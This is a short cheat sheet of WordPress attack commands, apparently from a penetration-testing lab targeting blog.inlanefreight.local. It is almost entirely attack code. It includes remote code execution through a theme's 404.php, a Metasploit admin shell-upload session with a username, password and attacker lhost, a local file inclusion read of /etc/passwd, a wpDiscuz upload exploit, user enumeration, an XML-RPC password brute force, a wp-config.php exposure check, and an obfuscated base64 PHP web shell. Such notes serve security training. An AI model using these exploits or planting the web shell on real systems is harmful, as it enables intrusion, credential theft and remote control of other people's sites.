# 2. Attacking WordPress

### 1. Manual Code Execution via Theme Editor (404.php)

```bash
curl http://blog.inlanefreight.local/wp-content/themes/twentynineteen/404.php?0=id
```

### 2. Metasploit wp\_admin\_shell\_upload

```bash
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts blog.inlanefreight.local
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set username john
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set password firebird1
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set lhost 10.10.14.15
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhost 10.129.42.195
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set VHOST blog.inlanefreight.local
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit
```

### 3. mail-masta LFI Exploit

```bash
curl -s http://blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
```

### 4. wpDiscuz RCE Exploit

#### Python Script Method

```bash
python3 wp_discuz.py -u http://blog.inlanefreight.local -p /?p=1
```

#### Curl Method

```bash
curl -s http://blog.inlanefreight.local/wp-content/uploads/2021/08/uthsdkbywoxeebg-1629904090.8191.php?cmd=id
```

### 5. WordPress REST API User Enumeration

```bash
curl -s http://blog.inlanefreight.local/wp-json/wp/v2/users
```

### 6. XML-RPC Brute Force (system.multicall)

```bash
python3 xmlrpc_bruteforce.py -u http://blog.inlanefreight.local/xmlrpc.php -U users.txt -P passwords.txt
```

### 7. wp-config.php Exposure Check

```bash
curl -s http://blog.inlanefreight.local/wp-config.php
```

### 8. Web Shell Obfuscation Example

```php
<?php eval(base64_decode("c3lzdGVtKCRfR0VUWyJjbWQiXSk7")); ?>
```